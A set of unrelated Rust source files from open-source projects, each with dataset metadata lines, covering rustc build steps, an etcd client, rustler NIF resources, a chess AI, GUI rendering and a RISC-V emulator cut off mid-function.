Interned<String>, } impl Step for ErrorIndex { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/tools/error_index_generator").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(ErrorIndex { target: run.target, }); } /// Generates the HTML rendered error-index by running the /// `error_index_generator` tool. fn run(self, builder: &Builder<'_>) { let target = self.target; builder.info(&format!("Documenting error index ({})", target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let compiler = builder.compiler(2, builder.config.build); let mut index = tool::ErrorIndex::command( builder, compiler, ); index.arg("html"); index.arg(out.join("error-index.html")); index.arg(crate::channel::CFG_RELEASE_NUM); // FIXME: shouldn't have to pass this env var index.env("CFG_BUILD", &builder.config.build); builder.run(&mut index); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct UnstableBookGen { target: Interned<String>, } impl Step for UnstableBookGen { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/tools/unstable-book-gen").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(UnstableBookGen { target: run.target, }); } fn run(self, builder: &Builder<'_>) { let target = self.target; builder.info(&format!("Generating unstable book md files ({})", target)); let out = builder.md_doc_out(target).join("unstable-book"); builder.create_dir(&out); builder.remove_dir(&out); let mut cmd = builder.tool_cmd(Tool::UnstableBookGen); cmd.arg(builder.src.join("src")); cmd.arg(out); builder.run(&mut cmd); } } fn symlink_dir_force(config: &Config, src: &Path, dst: &Path) -> io::Result<()> { if config.dry_run { return Ok(()); } if let Ok(m) = fs::symlink_metadata(dst) { if m.file_type().is_dir() { fs::remove_dir_all(dst)?; } else { // handle directory junctions on windows by falling back to // `remove_dir`. fs::remove_file(dst).or_else(|_| { fs::remove_dir(dst) })?; } } symlink_dir(config, src, dst) }
true
5d2f73cf25fa341765e065d0c679edf9d897efcc
Rust
aptend/leetcode-rua
/Rust/src/n0945_minimum_increment_to_make_array_unique.rs
UTF-8
518
2.96875
3
[]
no_license
pub fn min_increment_for_unique(a: Vec<i32>) -> i32 { let mut A = a; A.sort_unstable(); let mut n = -1i32; let mut ans = 0i32; for &x in A.iter() { if n < x { n = x; } else { ans += n - x + 1; n += 1; } } ans } #[test] fn test_945() { assert_eq!(1, min_increment_for_unique(vec![1, 2, 2])); assert_eq!(2, min_increment_for_unique(vec![0, 0, 2, 2])); assert_eq!(6, min_increment_for_unique(vec![3, 2, 1, 2, 1, 7])); }
true
9e13fc897a49106118c298a8624ad5095f102b30
Rust
0x192/iced_aw
/src/graphics/card.rs
UTF-8
8,253
2.828125
3
[ "MIT" ]
permissive
//! Displays a [`Card`](Card). //! //! *This API requires the following crate features to be activated: card* use iced_graphics::{ backend, defaults, Backend, Color, Defaults, HorizontalAlignment, Point, Primitive, Rectangle, Renderer, VerticalAlignment, }; use iced_native::{mouse, Element, Layout}; pub use crate::style::card::{Style, StyleSheet}; use crate::{core::renderer::DrawEnvironment, native::card}; /// A card consisting of a head, body and optional foot. /// /// This is an alias of an `iced_native` Card with an `iced_wgpu::Renderer`. pub type Card<'a, Message, Backend> = card::Card<'a, Message, Renderer<Backend>>; impl<B> card::Renderer for Renderer<B> where B: Backend + backend::Text, { type Style = Box<dyn StyleSheet>; const DEFAULT_PADDING: f32 = 10.0; fn default_size(&self) -> f32 { f32::from(self.backend().default_size()) } fn draw<Message>( &mut self, env: DrawEnvironment<'_, Self::Defaults, Self::Style, ()>, head: &iced_native::Element<'_, Message, Self>, body: &iced_native::Element<'_, Message, Self>, foot: &Option<iced_native::Element<'_, Message, Self>>, ) -> Self::Output { let bounds = env.layout.bounds(); let mut children = env.layout.children(); let style = env.style_sheet.active(); let mouse_interaction = mouse::Interaction::default(); let background = Primitive::Quad { bounds, background: style.background, border_radius: style.border_radius, border_width: style.border_width, border_color: style.border_color, }; let border = Primitive::Quad { bounds, background: Color::TRANSPARENT.into(), border_radius: style.border_radius, border_width: style.border_width, border_color: style.border_color, }; // ----------- Head ---------------------- let head_layout = children .next() .expect("Graphics: Layout should have a head layout"); let (head, head_mouse_interaction) = draw_head( self, head, head_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); // ----------- Body ---------------------- let body_layout = children .next() .expect("Graphics: Layout should have a body layout"); let (body, body_mouse_interaction) = draw_body( self, body, body_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); // ----------- Foot ---------------------- let foot_layout = children .next() .expect("Graphics: Layout should have a foot layout"); let (foot, foot_mouse_interaction) = draw_foot( self, foot, foot_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); ( Primitive::Group { primitives: vec![background, border, head, body, foot], }, mouse_interaction .max(head_mouse_interaction) .max(body_mouse_interaction) .max(foot_mouse_interaction), ) } } /// Draws the head of the card. fn draw_head<Message, B>( renderer: &mut Renderer<B>, head: &Element<'_, Message, Renderer<B>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut head_children = layout.children(); let head_background = Primitive::Quad { bounds: layout.bounds(), background: style.head_background, border_radius: style.border_radius, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (head, head_mouse_interaction) = head.draw( renderer, &Defaults { text: defaults::Text { color: style.head_text_color, }, }, head_children .next() .expect("Graphics: Layout should have a head content layout"), cursor_position, viewport, ); let (close, close_mouse_interaction) = head_children.next().map_or( (Primitive::None, mouse::Interaction::default()), |close_layout| { let close_bounds = close_layout.bounds(); let is_mouse_over_close = close_bounds.contains(cursor_position); ( Primitive::Text { content: super::icons::Icon::X.into(), font: super::icons::ICON_FONT, size: close_layout.bounds().height + if is_mouse_over_close { 5.0 } else { 0.0 }, bounds: Rectangle { x: close_bounds.center_x(), y: close_bounds.center_y(), ..close_bounds }, color: style.close_color, horizontal_alignment: HorizontalAlignment::Center, vertical_alignment: VerticalAlignment::Center, }, if is_mouse_over_close { mouse::Interaction::Pointer } else { mouse::Interaction::default() }, ) }, ); ( Primitive::Group { primitives: vec![head_background, head, close], }, head_mouse_interaction.max(close_mouse_interaction), ) } /// Draws the body of the card. fn draw_body<Message, B>( renderer: &mut Renderer<B>, body: &Element<'_, Message, Renderer<B>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut body_children = layout.children(); let body_background = Primitive::Quad { bounds: layout.bounds(), background: style.body_background, border_radius: 0.0, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (body, mouse_interaction) = body.draw( renderer, &Defaults { text: defaults::Text { color: style.body_text_color, }, }, body_children .next() .expect("Graphics: Layout should have a body content layout"), cursor_position, viewport, ); ( Primitive::Group { primitives: vec![body_background, body], }, mouse_interaction, ) } /// Draws the foot of the card. fn draw_foot<Message, B>( renderer: &mut Renderer<B>, foot: &Option<Element<'_, Message, Renderer<B>>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut foot_children = layout.children(); let foot_background = Primitive::Quad { bounds: layout.bounds(), background: style.foot_background, border_radius: style.border_radius, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (foot, foot_mouse_interaction) = foot.as_ref().map_or_else( || (Primitive::None, mouse::Interaction::default()), |foot| { foot.draw( renderer, &Defaults { text: defaults::Text { color: style.foot_text_color, }, }, foot_children .next() .expect("Graphics: Layout should have a foot content layout"), cursor_position, viewport, ) }, ); ( Primitive::Group { primitives: vec![foot_background, foot], }, foot_mouse_interaction, ) }
true
216b647ea72657a8aaef254ad0c0e3d3e2fd25a1
Rust
Sam-Gebhardt/ChessGame
/src/AI/min_max.rs
UTF-8
4,054
3.1875
3
[]
no_license
/* Chess AI that is built upon min/max with alpha pruning https://www.chessprogramming.org/Minimax https://www.chessprogramming.org/Alpha-Beta https://vitcapstoneproject.wordpress.com/2018/02/26/evaluating-a-board-position/ */ use crate::board::Board; use crate::pieces::piece_type; use crate::pieces::sign_checker; use crate::pieces::Moves; use crate::AI::eval; use crate::AI::random::print_move; // takes a move_set vec and adds the src to each move // in order to allow min/max to work fn add_source(src: [i8; 2], move_set: Vec<[i8; 2]>) -> Vec<[[i8; 2]; 2]> { let mut fixed: Vec<[[i8; 2]; 2]> = Vec::new(); for i in 0..move_set.len() { fixed.push([src, move_set[i]]); } return fixed; } // Generate all the moves for the pieces speciefed by color fn generate_all_moves(board: &Board, color: i8) -> Vec<[[i8; 2]; 2]> { let mut piece: Box<dyn Moves>; let mut moves: Vec<[[i8; 2]; 2]> = Vec::new(); let mut key: i8; for i in 0..8 { for j in 0..8 { key = board.get_piece(i, j); if sign_checker(key, color) { piece = piece_type(key, [i, j]); moves.append(&mut add_source([i, j], piece.move_set(board))); } } } return moves; } /* board: The current version of the board to maximize best: best possible move prev: The previous move from the last iteration of the min/max alpha: Number to max beta: number to min depth: Number of times to run */ fn max(board: Board, mut best: &mut [[i8; 2]; 2], mut prev: &mut [[i8; 2]; 2], mut alpha: i32, beta: i32, depth: i32) -> i32 { if depth == 0 { return eval::eval_board(&board, 1); } let mut score: i32; let mut board_copy: Board; let moves: Vec<[[i8; 2]; 2]> = generate_all_moves(&board, -1); for i in 0..moves.len() { board_copy = board.clone(); board_copy.move_piece(moves[i][0], moves[i][1]); score = min(board_copy, &mut best, &mut prev, alpha, beta, depth - 1); if score >= beta { return beta; } if score > alpha { // if depth is 3 (first iteration) save value // otherwise set the best move to the previous move if depth == 3 { *prev = moves[i]; } else if depth == 1 { *best = *prev; } alpha = score; } } return alpha; } /* board: The current version of the board to maximize best: best possible move prev: The previous move from the last iteration of the min/max alpha: Number to max beta: number to min depth: Number of times to run */ fn min(board: Board, mut best: &mut [[i8; 2]; 2], mut prev: &mut [[i8; 2]; 2], alpha: i32, mut beta: i32, depth: i32) -> i32 { if depth == 0 { return eval::eval_board(&board, -1); } let mut score: i32; let mut board_copy: Board; let moves: Vec<[[i8; 2]; 2]> = generate_all_moves(&board, 1); for i in 0..moves.len() { board_copy = board.clone(); board_copy.move_piece(moves[i][0], moves[i][1]); score = max(board_copy, &mut best, &mut prev, alpha, beta, depth - 1); if score <= alpha { return alpha; } if score < beta { beta = score; } } return beta; } pub fn select(board: &mut Board) { let board_copy: Board = board.clone(); // the best move will be the first element in the vector let mut best_move: [[i8; 2]; 2] = [[0, 0], [0, 0]]; let mut prev: [[i8; 2]; 2] = [[0, 0], [0, 0]]; // Run with a depth of 3 as default let _score: i32 = max(board_copy, &mut best_move, &mut prev, -9999999, 9999999, 3); // println!("{:?}", list_best); board.move_piece(best_move[0], best_move[1]); print_move(best_move); } /* Todo: Copying the board each time has a lot of over head, Can make general improvements: * See if the move puts the player in check */
true
2a1152836773d6b0b14d9bc8def3416744badbaa
Rust
abalmos/etcd-client
/src/lib.rs
UTF-8
6,792
2.5625
3
[ "MIT" ]
permissive
//! An [etcd](https://github.com/etcd-io/etcd) v3 API client for Rust. //! It provides asynchronous client backed by [tokio](https://github.com/tokio-rs/tokio) and [tonic](https://github.com/hyperium/tonic). //! //! # Supported APIs //! //! - KV //! - Watch //! - Lease //! - Auth //! - Maintenance //! - Cluster //! - Lock //! - Election //! //! # Usage //! //! Add this to your `Cargo.toml`: //! //! ```toml //! [dependencies] //! etcd-client = "0.7" //! tokio = { version = "1.0", features = ["full"] } //! ``` //! //! To get started using `etcd-client`: //! //! ```Rust //! use etcd_client::{Client, Error}; //! //! #[tokio::main] //! async fn main() -> Result<(), Error> { //! let mut client = Client::connect(["localhost:2379"], None).await?; //! // put kv //! client.put("foo", "bar", None).await?; //! // get kv //! let resp = client.get("foo", None).await?; //! if let Some(kv) = resp.kvs().first() { //! println!("Get kv: {{{}: {}}}", kv.key_str()?, kv.value_str()?); //! } //! //! Ok(()) //! } //! ``` //! //! # Examples //! //! Examples can be found in [`etcd-client/examples`](https://github.com/etcdv3/etcd-client/tree/master/examples). //! //! # Feature Flags //! //! - `tls`: Enables the `rustls`-based TLS connection. Not //! enabled by default. //! - `tls-roots`: Adds system trust roots to `rustls`-based TLS connection using the //! `rustls-native-certs` crate. Not enabled by default. //! - `pub-response-field`: Exposes structs used to create regular `etcd-client` responses //! including internal protobuf representations. Useful for mocking. Not enabled by default. #![cfg_attr(docsrs, feature(doc_cfg))] mod auth; mod client; mod error; mod rpc; pub use crate::client::{Client, ConnectOptions}; pub use crate::error::Error; pub use crate::rpc::auth::{ AuthClient, AuthDisableResponse, AuthEnableResponse, Permission, PermissionType, RoleAddResponse, RoleDeleteResponse, RoleGetResponse, RoleGrantPermissionResponse, RoleListResponse, RoleRevokePermissionOptions, RoleRevokePermissionResponse, UserAddOptions, UserAddResponse, UserChangePasswordResponse, UserDeleteResponse, UserGetResponse, UserGrantRoleResponse, UserListResponse, UserRevokeRoleResponse, }; pub use crate::rpc::cluster::{ ClusterClient, Member, MemberAddOptions, MemberAddResponse, MemberListResponse, MemberPromoteResponse, MemberRemoveResponse, MemberUpdateResponse, }; pub use crate::rpc::election::{ CampaignResponse, ElectionClient, LeaderKey, LeaderResponse, ObserveStream, ProclaimOptions, ProclaimResponse, ResignOptions, ResignResponse, }; pub use crate::rpc::kv::{ CompactionOptions, CompactionResponse, Compare, CompareOp, DeleteOptions, DeleteResponse, GetOptions, GetResponse, KvClient, PutOptions, PutResponse, SortOrder, SortTarget, Txn, TxnOp, TxnOpResponse, TxnResponse, }; pub use crate::rpc::lease::{ LeaseClient, LeaseGrantOptions, LeaseGrantResponse, LeaseKeepAliveResponse, LeaseKeepAliveStream, LeaseKeeper, LeaseLeasesResponse, LeaseRevokeResponse, LeaseStatus, LeaseTimeToLiveOptions, LeaseTimeToLiveResponse, }; pub use crate::rpc::lock::{LockClient, LockOptions, LockResponse, UnlockResponse}; pub use crate::rpc::maintenance::{ AlarmAction, AlarmMember, AlarmOptions, AlarmResponse, AlarmType, DefragmentResponse, HashKvResponse, HashResponse, MaintenanceClient, MoveLeaderResponse, SnapshotResponse, SnapshotStreaming, StatusResponse, }; pub use crate::rpc::watch::{ Event, EventType, WatchClient, WatchFilterType, WatchOptions, WatchResponse, WatchStream, Watcher, }; pub use crate::rpc::{KeyValue, ResponseHeader}; #[cfg(feature = "tls")] #[cfg_attr(docsrs, doc(cfg(feature = "tls")))] pub use tonic::transport::{Certificate, ClientTlsConfig as TlsOptions, Identity}; /// Exposes internal protobuf representations used to create regular public response types. #[cfg(feature = "pub-response-field")] #[cfg_attr(docsrs, doc(cfg(feature = "pub-response-field")))] pub mod proto { pub use crate::rpc::pb::etcdserverpb::AlarmMember as PbAlarmMember; pub use crate::rpc::pb::etcdserverpb::{ AlarmResponse as PbAlarmResponse, AuthDisableResponse as PbAuthDisableResponse, AuthEnableResponse as PbAuthEnableResponse, AuthRoleAddResponse as PbAuthRoleAddResponse, AuthRoleDeleteResponse as PbAuthRoleDeleteResponse, AuthRoleGetResponse as PbAuthRoleGetResponse, AuthRoleGrantPermissionResponse as PbAuthRoleGrantPermissionResponse, AuthRoleListResponse as PbAuthRoleListResponse, AuthRoleRevokePermissionResponse as PbAuthRoleRevokePermissionResponse, AuthUserAddResponse as PbAuthUserAddResponse, AuthUserChangePasswordResponse as PbAuthUserChangePasswordResponse, AuthUserDeleteResponse as PbAuthUserDeleteResponse, AuthUserGetResponse as PbAuthUserGetResponse, AuthUserGrantRoleResponse as PbAuthUserGrantRoleResponse, AuthUserListResponse as PbAuthUserListResponse, AuthUserRevokeRoleResponse as PbAuthUserRevokeRoleResponse, AuthenticateResponse as PbAuthenticateResponse, CompactionResponse as PbCompactionResponse, Compare as PbCompare, DefragmentResponse as PbDefragmentResponse, DeleteRangeResponse as PbDeleteResponse, HashKvResponse as PbHashKvResponse, HashResponse as PbHashResponse, LeaseGrantResponse as PbLeaseGrantResponse, LeaseKeepAliveResponse as PbLeaseKeepAliveResponse, LeaseLeasesResponse as PbLeaseLeasesResponse, LeaseRevokeResponse as PbLeaseRevokeResponse, LeaseStatus as PbLeaseStatus, LeaseTimeToLiveResponse as PbLeaseTimeToLiveResponse, Member as PbMember, MemberAddResponse as PbMemberAddResponse, MemberListResponse as PbMemberListResponse, MemberPromoteResponse as PbMemberPromoteResponse, MemberRemoveResponse as PbMemberRemoveResponse, MemberUpdateResponse as PbMemberUpdateResponse, MoveLeaderResponse as PbMoveLeaderResponse, PutResponse as PbPutResponse, RangeResponse as PbRangeResponse, ResponseHeader as PbResponseHeader, SnapshotResponse as PbSnapshotResponse, StatusResponse as PbStatusResponse, TxnResponse as PbTxnResponse, WatchResponse as PbWatchResponse, }; pub use crate::rpc::pb::mvccpb::Event as PbEvent; pub use crate::rpc::pb::mvccpb::KeyValue as PbKeyValue; pub use crate::rpc::pb::v3electionpb::{ CampaignResponse as PbCampaignResponse, LeaderKey as PbLeaderKey, LeaderResponse as PbLeaderResponse, ProclaimResponse as PbProclaimResponse, ResignResponse as PbResignResponse, }; pub use crate::rpc::pb::v3lockpb::{ LockResponse as PbLockResponse, UnlockResponse as PbUnlockResponse, }; }
true
c183f30ed722617a356c78c129b68c49e4f2ac82
Rust
Dherse/secs
/codegen/src/entity.rs
UTF-8
2,183
2.71875
3
[]
no_license
use proc_macro2::TokenStream; use crate::{component::Component, ecs::ECS, GenericOutput}; pub(crate) fn make_entity_builder( main: &ECS, components: &[Component], generics: &GenericOutput, ) -> TokenStream { let name = main.as_entity_builder_ident(); let fields = components.iter().map(|comp| { let name = comp.as_ident(); let ty = comp.as_ty(); quote::quote! { #name: Option<#ty> } }); let fields_default = components.iter().map(|comp| { let name = comp.as_ident(); quote::quote! { #name: None } }); let setters_fn = components.iter().map(|comp| { let name = comp.as_ident(); let name_add = comp.as_add_ident(); let name_del = comp.as_del_ident(); let ty = comp.as_ty(); let doc_str = format!( "Adds the component '{}' of type [`{}`] to the entity", comp.name, comp.path ); let doc_del = format!( "Removes the component '{}' of type [`{}`] to the entity", comp.name, comp.path ); quote::quote! { #[doc = #doc_str] pub fn #name(mut self, value: #ty) -> Self { self.#name = Some(value); self } #[doc = #doc_str] pub fn #name_add(&mut self, value: #ty) -> &mut Self { self.#name = Some(value); self } #[doc = #doc_del] pub fn #name_del(&mut self) -> &mut Self { self.#name = None; self } } }); let component_generics = &generics.components; quote::quote! { pub struct #name#component_generics { entity: ::secs::Entity, #(#fields,)* } impl#component_generics #name#component_generics { fn new(entity: ::secs::Entity) -> Self { Self { entity, #(#fields_default,)* } } pub fn entity(&self) -> ::secs::Entity { self.entity } #(#setters_fn)* } } }
true
a666beb63614eb5764e64f411973b9f07e541bb3
Rust
rusterlium/rustler
/rustler/src/resource.rs
UTF-8
9,922
3.1875
3
[ "MIT", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! Support for storing Rust data in Erlang terms. //! //! A NIF resource allows you to safely store Rust structs in a term, and therefore keep it across //! NIF calls. The struct will be automatically dropped when the BEAM GC decides that there are no //! more references to the resource. use std::marker::PhantomData; use std::mem; use std::ops::Deref; use std::ptr; use super::{Binary, Decoder, Encoder, Env, Error, NifResult, Term}; use crate::wrapper::{ c_void, resource, NifResourceFlags, MUTABLE_NIF_RESOURCE_HANDLE, NIF_ENV, NIF_RESOURCE_TYPE, }; /// Re-export a type used by the `resource!` macro. #[doc(hidden)] pub use crate::wrapper::NIF_RESOURCE_FLAGS; /// The ResourceType struct contains a NIF_RESOURCE_TYPE and a phantom reference to the type it /// is for. It serves as a holder for the information needed to interact with the Erlang VM about /// the resource type. /// /// This is usually stored in an implementation of ResourceTypeProvider. #[doc(hidden)] pub struct ResourceType<T> { pub res: NIF_RESOURCE_TYPE, pub struct_type: PhantomData<T>, } /// This trait gets implemented for the type we want to put into a resource when /// resource! is called on it. It provides the ResourceType. /// /// In most cases the user should not have to worry about this. #[doc(hidden)] pub trait ResourceTypeProvider: Sized + Send + Sync + 'static { fn get_type() -> &'static ResourceType<Self>; } impl<T> Encoder for ResourceArc<T> where T: ResourceTypeProvider, { fn encode<'a>(&self, env: Env<'a>) -> Term<'a> { self.as_term(env) } } impl<'a, T> Decoder<'a> for ResourceArc<T> where T: ResourceTypeProvider + 'a, { fn decode(term: Term<'a>) -> NifResult<Self> { ResourceArc::from_term(term) } } /// Drop a T that lives in an Erlang resource. (erlang_nif-sys requires us to declare this /// function safe, but it is of course thoroughly unsafe!) extern "C" fn resource_destructor<T>(_env: NIF_ENV, handle: MUTABLE_NIF_RESOURCE_HANDLE) { unsafe { let aligned = align_alloced_mem_for_struct::<T>(handle); let res = aligned as *mut T; ptr::read(res); } } /// This is the function that gets called from resource! in on_load to create a new /// resource type. /// /// # Panics /// /// Panics if `name` isn't null-terminated. #[doc(hidden)] pub fn open_struct_resource_type<T: ResourceTypeProvider>( env: Env, name: &str, flags: NifResourceFlags, ) -> Option<ResourceType<T>> { let res: Option<NIF_RESOURCE_TYPE> = unsafe { resource::open_resource_type( env.as_c_arg(), name.as_bytes(), Some(resource_destructor::<T>), flags, ) }; res.map(|r| ResourceType { res: r, struct_type: PhantomData, }) } fn get_alloc_size_struct<T>() -> usize { mem::size_of::<T>() + mem::align_of::<T>() } /// Given a pointer `ptr` to an allocation of `get_alloc_size_struct::<T>()` bytes, return the /// first aligned pointer within the allocation where a `T` may be stored. /// Unsafe: `ptr` must point to a large enough allocation and not be null. unsafe fn align_alloced_mem_for_struct<T>(ptr: *const c_void) -> *const c_void { let offset = mem::align_of::<T>() - ((ptr as usize) % mem::align_of::<T>()); ptr.add(offset) } /// A reference to a resource of type `T`. /// /// This type is like `std::sync::Arc`: it provides thread-safe, reference-counted storage for Rust /// data that can be shared across threads. Data stored this way is immutable by default. If you /// need to modify data in a resource, use a `std::sync::Mutex` or `RwLock`. /// /// Rust code and Erlang code can both have references to the same resource at the same time. Rust /// code uses `ResourceArc`; in Erlang, a reference to a resource is a kind of term. You can /// convert back and forth between the two using `Encoder` and `Decoder`. pub struct ResourceArc<T> where T: ResourceTypeProvider, { raw: *const c_void, inner: *mut T, } // Safe because T is `Sync` and `Send`. unsafe impl<T> Send for ResourceArc<T> where T: ResourceTypeProvider {} unsafe impl<T> Sync for ResourceArc<T> where T: ResourceTypeProvider {} impl<T> ResourceArc<T> where T: ResourceTypeProvider, { /// Makes a new ResourceArc from the given type. Note that the type must have /// ResourceTypeProvider implemented for it. See module documentation for info on this. pub fn new(data: T) -> Self { let alloc_size = get_alloc_size_struct::<T>(); let mem_raw = unsafe { resource::alloc_resource(T::get_type().res, alloc_size) }; let aligned_mem = unsafe { align_alloced_mem_for_struct::<T>(mem_raw) as *mut T }; unsafe { ptr::write(aligned_mem, data) }; ResourceArc { raw: mem_raw, inner: aligned_mem, } } /// Make a resource binary associated with the given resource /// /// The closure `f` is called with the referenced object and must return a slice with the same /// lifetime as the object. This means that the slice either has to be derived directly from /// the instance or that it has to have static lifetime. pub fn make_binary<'env, 'a, F>(&self, env: Env<'env>, f: F) -> Binary<'env> where F: FnOnce(&'a T) -> &'a [u8], { // This call is safe because `f` can only return a slice that lives at least as long as // the given instance of `T`. unsafe { self.make_binary_unsafe(env, f) } } /// Make a resource binary without strict lifetime checking /// /// The user *must* ensure that the lifetime of the returned slice is at least as long as the /// lifetime of the referenced instance. /// /// # Safety /// /// This function is only safe if the slice that is returned from the closure is guaranteed to /// live at least as long as the `ResourceArc` instance. If in doubt, use the safe version /// `ResourceArc::make_binary` which enforces this bound through its signature. pub unsafe fn make_binary_unsafe<'env, 'a, 'b, F>(&self, env: Env<'env>, f: F) -> Binary<'env> where F: FnOnce(&'a T) -> &'b [u8], { let bin = f(&*self.inner); let binary = rustler_sys::enif_make_resource_binary( env.as_c_arg(), self.raw, bin.as_ptr() as *const c_void, bin.len(), ); let term = Term::new(env, binary); Binary::from_term_and_slice(term, bin) } fn from_term(term: Term) -> Result<Self, Error> { let res_resource = match unsafe { resource::get_resource( term.get_env().as_c_arg(), term.as_c_arg(), T::get_type().res, ) } { Some(res) => res, None => return Err(Error::BadArg), }; unsafe { resource::keep_resource(res_resource); } let casted_ptr = unsafe { align_alloced_mem_for_struct::<T>(res_resource) as *mut T }; Ok(ResourceArc { raw: res_resource, inner: casted_ptr, }) } fn as_term<'a>(&self, env: Env<'a>) -> Term<'a> { unsafe { Term::new(env, resource::make_resource(env.as_c_arg(), self.raw)) } } fn as_c_arg(&mut self) -> *const c_void { self.raw } fn inner(&self) -> &T { unsafe { &*self.inner } } } impl<T> Deref for ResourceArc<T> where T: ResourceTypeProvider, { type Target = T; fn deref(&self) -> &T { self.inner() } } impl<T> Clone for ResourceArc<T> where T: ResourceTypeProvider, { /// Cloning a `ResourceArc` simply increments the reference count for the /// resource. The `T` value is not cloned. fn clone(&self) -> Self { unsafe { resource::keep_resource(self.raw); } ResourceArc { raw: self.raw, inner: self.inner, } } } impl<T> Drop for ResourceArc<T> where T: ResourceTypeProvider, { /// When a `ResourceArc` is dropped, the reference count is decremented. If /// there are no other references to the resource, the `T` value is dropped. /// /// However, note that in general, the Rust value in a resource is dropped /// at an unpredictable time: whenever the VM decides to do garbage /// collection. fn drop(&mut self) { unsafe { rustler_sys::enif_release_resource(self.as_c_arg()) }; } } #[macro_export] #[deprecated(since = "0.22.0", note = "Please use `resource!` instead.")] macro_rules! resource_struct_init { ($struct_name:ty, $env: ident) => { $crate::resource!($struct_name, $env) }; } #[macro_export] macro_rules! resource { ($struct_name:ty, $env: ident) => { { static mut STRUCT_TYPE: Option<$crate::resource::ResourceType<$struct_name>> = None; let temp_struct_type = match $crate::resource::open_struct_resource_type::<$struct_name>( $env, concat!(stringify!($struct_name), "\x00"), $crate::resource::NIF_RESOURCE_FLAGS::ERL_NIF_RT_CREATE ) { Some(inner) => inner, None => { println!("Failure in creating resource type"); return false; } }; unsafe { STRUCT_TYPE = Some(temp_struct_type) }; impl $crate::resource::ResourceTypeProvider for $struct_name { fn get_type() -> &'static $crate::resource::ResourceType<Self> { unsafe { &STRUCT_TYPE }.as_ref() .expect("The resource type hasn't been initialized. Did you remember to call the function where you used the `resource!` macro?") } } } } }
true
ee8c490a49a4839349561cbb12d2d35de05a76f1
Rust
Kryndex/tfs
/atomic-hashmap/src/lib.rs
UTF-8
2,071
3.125
3
[ "MIT" ]
permissive
//! Implementation of a lock-free, atomic hash table. //! //! This crate provides a high-performance implementation of a completely lock-free (no mutexes, no //! spin-locks, or the alike) hash table. //! //! The only instruction we use is CAS, which allows us to atomically update the table. //! //! # Design //! //! The design is similar to Feldman's lock-free hash table, but diverge on several key points. //! //! It is structured as a 256-radix tree with a pseudorandom permutation applied to the key. //! Contrary to open addressing, this approach is entirely lock-free and need not reallocation. //! //! The permutation is a simple table+XOR based length-padded function, which is applied to avoid //! excessive depth (this is what makes it a "hash table"). extern crate crossbeam; mod sponge; mod table; use std::hash::Hash; use crossbeam::mem::epoch::{self, Atomic}; use sponge::Sponge; pub struct HashMap<K, V> { table: table::Table<K, V>, } impl<K: Hash + Eq, V> HashMap<K, V> { pub fn insert(&self, key: K, val: V) -> Option<epoch::Pinned<V>> { let guard = epoch::pin(); self.table.insert(table::Pair { key: key, val: val, }, Sponge::new(&key), guard).into_pinned(guard) } pub fn remove(&self, key: K, sponge: Sponge) -> Option<epoch::Pinned<V>> { let guard = epoch::pin(); self.table.remove(key, Sponge::new(&key), guard).into_pinned(guard) } pub fn for_each<F: Fn(K, V)>(&self, f: F) { let guard = epoch::pin(); self.table.for_each(f, guard); } pub fn take_each<F: Fn(K, V)>(&self, f: F) { let guard = epoch::pin(); self.table.take_each(f, guard); } pub fn clear(&self) { self.take_each(|_| ()); } } impl<'a, K: Hash + Eq, V> Into<std::collections::HashMap<K, V>> for &'a HashMap<K, V> { fn into(self) -> std::collections::HashMap<K, V> { let mut hm = std::collections::HashMap::new(); self.for_each(|key, val| { hm.insert(key, val); }); hm } }
true
03278843363ed80b2fd6f9c45e019135710c38d6
Rust
luojia65/emu6
/libemu6/src/riscv/exec.rs
UTF-8
20,800
2.5625
3
[]
no_license
use super::fetch::*; use super::imm::{Imm, Uimm}; use super::regfile::{Csr, XReg, FReg}; use super::*; use crate::error::Result; use crate::mem64::Physical; use crate::size::{Isize, Usize}; use thiserror::Error; #[derive(Error, Clone, Debug)] pub enum ExecError { #[error("extension is not supported")] ExtensionNotSupported, } fn pc_to_mem_addr(pc: Usize) -> u64 { match pc { Usize::U32(a) => a as u64, Usize::U64(a) => a, } } pub struct Execute<'a> { data_mem: &'a mut Physical<'a>, x: Box<XReg>, f: Box<FReg>, csr: Box<Csr>, xlen: Xlen, } impl<'a> core::fmt::Debug for Execute<'a> { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { f.debug_struct("Execute") .field("x", &self.x) .field("xlen", &self.xlen) .finish() } } impl<'a> Execute<'a> { pub fn new(data_mem: &'a mut Physical<'a>, xlen: Xlen) -> Execute<'a> { Execute { data_mem, x: Box::new(XReg::new_zeroed(xlen)), f: Box::new(FReg::new_zeroed()), csr: Box::new(Csr::new(xlen)), xlen, } } // returns next PC value #[rustfmt::skip] pub fn execute(&mut self, ins: Instruction, pc: Usize) -> Result<Usize> { let xlen = self.xlen; let next_pc = match ins { Instruction::RV32I(ins) => exec_rv32i( ins, &mut self.x, &mut self.data_mem, pc, |imm| imm.sext(xlen), )?, Instruction::RV64I(ins) => { exec_rv64i( ins, &mut self.x, &mut self.data_mem, |imm| imm.sext(xlen), || xlen == Xlen::X64 || xlen == Xlen::X128, )?; pc + 4 }, Instruction::RVZicsr(ins) => { exec_rvzicsr( ins, &mut self.x, 